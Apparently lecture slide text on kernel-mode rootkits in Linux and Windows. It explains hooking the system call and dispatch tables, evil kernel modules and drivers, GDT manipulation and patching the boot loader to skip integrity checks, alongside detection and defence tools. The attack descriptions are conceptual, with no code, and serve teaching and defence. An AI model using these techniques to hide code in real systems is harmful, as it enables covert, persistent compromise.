Advantages over User Level Rootkit: Changes all programs that try to

discover something from the kernel. Statically linked binary forensic tools

no longer work

Linux Kernel

Linux allows us to look at many internal kernel structures: /proc

Slash proc Virtual directory, lives only in memory. Lots of commands just grab info from

/proc. We can write to certain areas of /proc

such as /proc/net

Linux Kernel /proc

/cpuinfo /devices /ksmg

Log messages from kernel /ksyms

List of all variables and functions that are exported via loadable kernel modules on the machine

Linux Kernel

/proc /net /stat

Statistics such as data about CPU, virtual memory, hard drive usage

/sys Kernel variables.

/version

Linux Kernel /dev

Contains pointers to various devices. /dev/kmem

Image of the running kernel’s memory /dev/mem

Image of all the memory

Gibberish without special tools

Linux Kernel User mode processes use System Calls

to access kernel. Embedded in the systems libraries:

SYS_open SYS_read SYS_write SYS_execve SYS_setuid SYS_get_kernel_syms SYS_query_module

Linux Kernel

Located in /usr/include/sys/syscall.h /usr/include/bits/syscall.h /usr/include/asm/unistd.h Or similar locations.

Linux Kernel System Call Table:

Array maintained by the kernel that maps individual system call names and numbers.

Located also in memory. On harddrive:

“less /boot/System.map”

Use strace to find the system calls made by a command: “strace ls”

Linux Kernel

Linux Kernel Manipulations

Loadable Kernel Modules Legitimate Linux / Solaris kernel

feature Add support for new hardware Can replace existing kernel features

without system reboot.


Attacker uses insmod to Alter System Call

Table. Load Kernel

module.

Linux Kernel Manipulations Evil kernel module alters SYS_execve Looks at

calling process. If process is for a program that attacker wants to

redirect Evil kernel module actually calls another program.

Attacker can wrap the true SYS_execve code. Makes it easy to generate the altered version of

SYS_execve. This alteration defeats file integrity checking tools.

SYS_execve code is still there, only Never called. Called if not interfering with attacker (if wrapped).

True login function, true sshd, true … not called, but replacements are.


Loadable kernel modules do not survive a system reboot.

Attacker alters programs in the boot process. init Once inserted, loadable kernel

module hides changes to the altered boot process


Mighty Adore Loadable kernel module Adore interface: Ava.

Kernel Intrusion System (KIS) Comes with slick GUI


Alternative to Loadable Kernel Module

Use /dev/kmem Attackers can use tools that read and

write to kernel memory image. Attacker can insert alternative code for

system calls. Attacker can change the System Call

Table.


Patching Kernel Image File Simplest way:

Attacker “patches” vmlinuz file. Contains the kernel image.


User Mode Linux (UML) UML at user-mode-

linux.sourceforge.net Runs entire Linux kernel inside a

normal user-mode process. Like VMWare, creates virtual

environment. Sysads, users are running in this

virtual environment.


Kernel Mode Linux Project Allows certain user processes to run

in kernel mode. Attacker patches kernel with KML. Attacker now has processes that run

in kernel mode. Writes code to alter system call table and

system call code.

Defending the Linux Kernel Prevention

Deny superuser access to attackers. Patch quickly. Change kernel so that it no longer

allows loadable kernel modules. Redhat 8.0, Redhat 9.0, Linux 2.5.41

Install Systrace to track and limit systems calls.

Use Linux Security Module in your kernel.

Defending the Linux Kernel Kernel Mode RootKit Detection

Look for suspicious network activity File Integrity Checkers (to catch the not

quite good enough hacker). Use systrace to follow system calls made by

an application. www.city.umich.edu/u/provos/systrace (free tool).

chkrootkit Looks for system anomalies.

Each directory has a link count. Link count should be equal to the number of files + 2.

Defending the Linux Kernel

Kernel Mode RootKit Detection Kernel Security Therapy Anti-Trolls

(Linux 2.4) Looks for changes to the system call table. Scans /dev/kmem Looks for memory locations of system calls

and compares with System.map Creates fingerprints of system calls and

various critical programs.

Defending the Linux Kernel Kernel Mode RootKit Detection

Syscall Sentry Loadable kernel module. Checks for modules that alter the system table. Alerts system administrator in this case.

Rootkit Hunter www.rootkits.nl Similar to Chkrootkit

Rootkit Revealer (windows) by Russinovich Blacklight (windows) F-secure

Defending the Linux Kernel

Investigating potentially rootkitted systems: Boot from a trusted CD

Helix, Knoppix, … Boot a small linux OS Contain Windows forensics tools.

Windows Kernel

User process calls DLL

DLL can

return to user process.

Go to csrss.exe (client server runtime)

Require kernel function

Windows Kernel User process makes call to ReadFile Win32 Subsytem DLL makes call to NtReadFile

in Ntdll.dll Ntdll.dll translates well-documented API into rather

obscure ones (that can be easily changed.) Ntdll.dll makes a call to the Executive.

Executive sits inside ntoskrnl.exe Determines which piece of kernel code is needed to

handle request. Kernel code interacts with hardware (disk). Uses Hardware Abstraction Layer (HAL.dll).

Windows Kernel

Ntdll.dll call into kernel: System service dispatching.

Essentially a system call. Uses the System Service Dispatch

Table. Table indicates where the appropriate

system service code is located within the kernel.

Windows Kernel

Fewer tools allow us to look at kernel structures.

Windows Kernel: Tools

Ctrl + Alt + Del Task Manager Process Table

Windows Kernel: Tools System Idle Process PID 0

Just accounts for idle CPU time, not a real process.

System Process with PID 8 Contains data on all running threads in kernel

mode. Smss.exe (Session Manager)

First user mode process running on the machine.

Activated by kernel during system boot. Analogous to the Unix Init Daemon.

Windows Kernel: Tools Csrss.exe

Process that manages the Win32 system.

Initiated by Smss.exe. Winlogon.exe

Let’s users log on to the system. Smss.exe, CSrss.exe, Winlogon.exe

are the first processes after boot to run in user mode.

Windows Kernel: Tools Start Control Panel Administrative Tools Performance

Click “+” and check process

Kernel (red line) is using up time.


Process Explorerhttp://www.sysinternals.com/ntw2k/

freeware/procexp.shtml

Shows every running process.

Displays process hierarchy.


DependencyWalker (www.dependencywalker.com)

Traces relationship between user processes and the user-mode DLLs.

Allows us to see when the kernel is invoked.

Manipulating Windows Kernel

Same basic strategies as in Linux: Evil Device Driver.

Corresponds to Loadable Kernel Module Alter running kernel in memory. Overwrite kernel image on file. Deploy kernel on a virtual system. Run user-mode code at kernel level.

Manipulating Windows Kernel Evil Device Driver

Alters system service call handling by loading a device driver.

Replaces or alters kernel functions. Needs administrator privileges. Needs to get evil code to run:

Overwrite existing kernel functionality Alter system service dispatch table to point to

new code. Alter System Service Dispatcher.


If a Windows administrator installs a device driver, Windows will check for a valid digital signature.

Attacker with root privileges just accepts the warning.

Manipulating Windows Kernel Various alternatives to get evil

device driver to run: Evil driver can overwrite kernel.

Driver replaces existing code. Evil driver implements various kernel

functions and then changes the system dispatch table.

“Interrupt hooking” changes how the kernel handles CPU interrupts.


Altering a Running Kernel in Memory Instead of a device driver, directly

change the kernel code in memory.

Manipulating Windows Kernel Altering a Running Kernel in Memory:

Windows uses the Global Descriptor Table (GDT) to manage memory.

GDT stores division into various segments. Store segment accessibility by ring 0/3.

Unfortunately, attacker can add a memory segment to the GDT.

Greg Hoglund Phrak 55 Explains how to bypass Security Monitor. Add memory segment from location 0x00000000

to 0xffffffff. This gives memory access to all user processes!


Altering a Running Kernel in Memory: Alternatively, manipulate \Device\

PhysicalMemory object. Alternatively, use PhysMem from

sysinternals.com. Attacker can now change system

functionality.

Manipulating Windows Kernel Patching the Kernel on the Hard Drive

Not as easy as it sounds. System boot checks integrity of

Ntoskrnl.exe. Thus, not possible to only change the kernel file. Have to change both the integrity checker and

the kernel. Integrity checker sits in NTLDR.

Attack: Change one instruction to jump over the integrity check.

Currently, not heavily used.


Patching the Kernel on the Hard Drive Patch first NTLDR to disable integrity

check. Then patch Ntoskrnl.exe to disable

security access check. Now introduce rootkit.


Create a fake system using a virtual machine. Variety of Virtual Machines

VMWare Virtual PC Plex86 Bochs

But need to hide start-up message. Unlike Linux, that is difficult.

Protecting the Windows Kernel

Prevent access to the machine. Detect a rootkit:

Antivirus tools recognize most rootkit files before installation.

Some rootkits can be spotted afterwards.

Because developers were careless. File Integrity Checkers

Protecting the Windows Kernel

Removing Rootkits Analyze system without invoking the

kernel. Use a FIRE or Knoppix bootable CD-

ROM and look at the hard drive. Registry / File System.

Next Generation Malware

BIOS Malware active before booting from a

device. Bioscentral website for tools to look at

BIOS. Microkernel

malware: scanners, sniffers, viruses, worms, mobile code

Documents

response of target

target system

target logs

reset packet

closed port

synack response

mac address of access

spoofed mac of access